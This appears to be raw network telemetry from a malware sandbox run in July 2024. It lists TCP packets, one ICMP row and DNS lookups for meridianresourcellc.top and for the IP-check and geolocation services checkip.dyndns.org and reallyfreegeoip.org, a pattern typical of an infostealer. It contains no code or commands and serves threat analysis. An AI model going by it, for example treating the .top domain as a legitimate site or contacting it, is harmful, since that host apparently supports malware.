                                              Jul 26, 2024 23:45:17.312860012 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.312926054 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.313785076 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.313859940 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.313910007 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.313972950 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.315542936 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.315615892 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.315668106 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.315736055 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.315870047 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.315936089 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.315993071 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.316059113 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.316189051 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.316255093 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.316312075 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.316379070 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.316612005 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.316698074 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.316750050 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.316822052 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.406127930 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.406266928 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.406400919 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.406402111 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.406466007 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.406522036 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.406544924 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:17.406547070 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.406577110 CEST44349166104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:17.406642914 CEST49166443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.365761995 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.365828037 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.366235971 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.366305113 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.366360903 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.366422892 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.386269093 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.386358023 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.386394978 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.386455059 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.386832952 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.386904001 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.386959076 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.387020111 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.388977051 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.389050961 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.389065981 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.389121056 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.389373064 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.389431953 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.389436960 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.389462948 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.389492989 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.389492989 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.390209913 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.390285015 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.390317917 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.390373945 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.390506029 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.390569925 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.390597105 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.390644073 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.391091108 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.391155958 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.391180992 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.391233921 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.453140020 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.453249931 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.453270912 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.453291893 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.453319073 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.453336000 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.453502893 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.453555107 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.453592062 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.453654051 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.453834057 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.453896046 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.454030991 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.454097986 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.454125881 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.454181910 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.454926014 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.454989910 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.455003977 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.455053091 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.473694086 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.473771095 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.473777056 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.473798037 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.473829031 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.473848104 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.473917961 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.473964930 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.474690914 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.474751949 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.474754095 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.474765062 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.474812031 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.476671934 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.476728916 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.476736069 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.476747990 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.476780891 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.476800919 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.477497101 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.477554083 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.477561951 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.477572918 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.477616072 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.477616072 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.477634907 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.477684975 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.477694035 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.477729082 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.477734089 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.477754116 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.477772951 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.478008032 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.478020906 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:24.062685013 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.062761068 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.062827110 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.130434990 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.130507946 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.610395908 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.610471964 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.624692917 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.624718904 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.625612974 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.628084898 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.668544054 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.971131086 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.971409082 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.971478939 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.990869999 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.990909100 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:28.153529882 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:28.153568983 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:28.153606892 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:28.153911114 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:28.153922081 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:28.264107943 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:28.272310019 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:28.272376060 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:28.321165085 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:28.325965881 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:28.632390976 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:28.632476091 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:28.680473089 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:28.680546045 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:28.681579113 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:28.683728933 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:28.724503040 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:28.967530012 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:29.015403032 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:29.015676975 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:29.015744925 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:29.175510883 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:29.175565004 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:29.225337029 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:29.225384951 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:30.462775946 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:30.467641115 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:30.671293020 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:30.788258076 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:30.788353920 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:30.788424015 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:30.795545101 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:30.795584917 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:30.886786938 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:30.886951923 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:32.183284044 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:32.183365107 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:32.206785917 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:32.206845999 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:32.207318068 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:32.412564039 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:32.412775993 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:33.053769112 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:33.096539974 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:33.922913074 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:33.923146009 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:33.923202038 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:33.935558081 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:34.019804955 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:34.024970055 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:34.230139017 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:34.232292891 CEST49173443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:34.232346058 CEST44349173188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:34.232405901 CEST49173443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:34.232697964 CEST49173443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:34.232711077 CEST44349173188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:34.439461946 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:34.439640045 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:34.711932898 CEST44349173188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:34.761430025 CEST49173443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:34.761490107 CEST44349173188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:34.871000051 CEST44349173188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:34.871216059 CEST44349173188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:34.871391058 CEST49173443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:34.878443003 CEST49173443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:35.158451080 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:35.164382935 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:35.164446115 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:35.204164982 CEST4917480192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:35.209104061 CEST8049174193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:35.209163904 CEST4917480192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:35.209233046 CEST4917480192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:35.214034081 CEST8049174193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:35.669509888 CEST8049174193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:35.730554104 CEST49175443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:35.730643988 CEST44349175188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:35.730725050 CEST49175443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:35.731021881 CEST49175443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:35.731059074 CEST44349175188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:35.862446070 CEST4917480192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:36.202023029 CEST44349175188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:36.210728884 CEST49175443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:36.210783005 CEST44349175188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:36.335963964 CEST44349175188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:36.336215973 CEST44349175188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:36.336280107 CEST49175443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:36.338728905 CEST49175443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:36.617019892 CEST4917480192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:36.623720884 CEST8049174193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:36.624469995 CEST4917480192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:36.632791042 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:36.637640953 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:36.641151905 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:36.649858952 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:36.654649973 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:36.775588036 CEST4917780192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:36.780467033 CEST8049177193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:36.780524015 CEST4917780192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:36.780706882 CEST4917780192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:36.785500050 CEST8049177193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:37.202109098 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:37.415529966 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:37.415595055 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:37.488856077 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:37.493700981 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:37.848849058 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:37.871721983 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:37.871771097 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:37.871967077 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:37.874774933 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:37.874794006 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.046314955 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:38.378443956 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.378520012 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:38.383169889 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:38.383193970 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.383569002 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.588583946 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.588687897 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:38.753609896 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:38.800502062 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.874138117 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.874377012 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.874439955 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:38.875458002 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:38.902432919 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:38.908186913 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:39.061602116 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:39.064282894 CEST49179443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:39.064361095 CEST44349179188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:39.064630032 CEST49179443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:39.065753937 CEST49179443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:39.065788031 CEST44349179188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:39.278728962 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:39.412964106 CEST8049177193.122.6.168192.168.2.22
Timestamp    Source IP    Dest IP    Checksum    Code    Type
Jul 26, 2024 23:45:04.934621096 CEST    192.168.2.22    8.8.8.8    d02d    (Port unreachable)    Destination Unreachable
Timestamp    Source IP    Dest IP    Trans ID    Reply Code    Name    CName    Address    Type    Class    DNS over HTTPS
                                              Jul 26, 2024 23:45:28.114315033 CEST8.8.8.8192.168.2.220xae0fNo error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.185820103 CEST8.8.8.8192.168.2.220x63c0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.185820103 CEST8.8.8.8192.168.2.220x63c0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.185820103 CEST8.8.8.8192.168.2.220x63c0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.185820103 CEST8.8.8.8192.168.2.220x63c0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.185820103 CEST8.8.8.8192.168.2.220x63c0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.185820103 CEST8.8.8.8192.168.2.220x63c0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.251365900 CEST8.8.8.8192.168.2.220xe435No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.251365900 CEST8.8.8.8192.168.2.220xe435No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.251365900 CEST8.8.8.8192.168.2.220xe435No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.251365900 CEST8.8.8.8192.168.2.220xe435No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.251365900 CEST8.8.8.8192.168.2.220xe435No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.251365900 CEST8.8.8.8192.168.2.220xe435No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:30.750123978 CEST8.8.8.8192.168.2.220x3571No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:30.750123978 CEST8.8.8.8192.168.2.220x3571No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.186748981 CEST8.8.8.8192.168.2.220x2a3fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.186748981 CEST8.8.8.8192.168.2.220x2a3fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.186748981 CEST8.8.8.8192.168.2.220x2a3fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.186748981 CEST8.8.8.8192.168.2.220x2a3fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.186748981 CEST8.8.8.8192.168.2.220x2a3fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.186748981 CEST8.8.8.8192.168.2.220x2a3fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.203803062 CEST8.8.8.8192.168.2.220xc284No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.203803062 CEST8.8.8.8192.168.2.220xc284No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.203803062 CEST8.8.8.8192.168.2.220xc284No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.203803062 CEST8.8.8.8192.168.2.220xc284No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.203803062 CEST8.8.8.8192.168.2.220xc284No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.203803062 CEST8.8.8.8192.168.2.220xc284No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.718290091 CEST8.8.8.8192.168.2.220x94d0No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.718290091 CEST8.8.8.8192.168.2.220x94d0No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.466989040 CEST8.8.8.8192.168.2.220x5323No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.466989040 CEST8.8.8.8192.168.2.220x5323No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.466989040 CEST8.8.8.8192.168.2.220x5323No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.466989040 CEST8.8.8.8192.168.2.220x5323No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
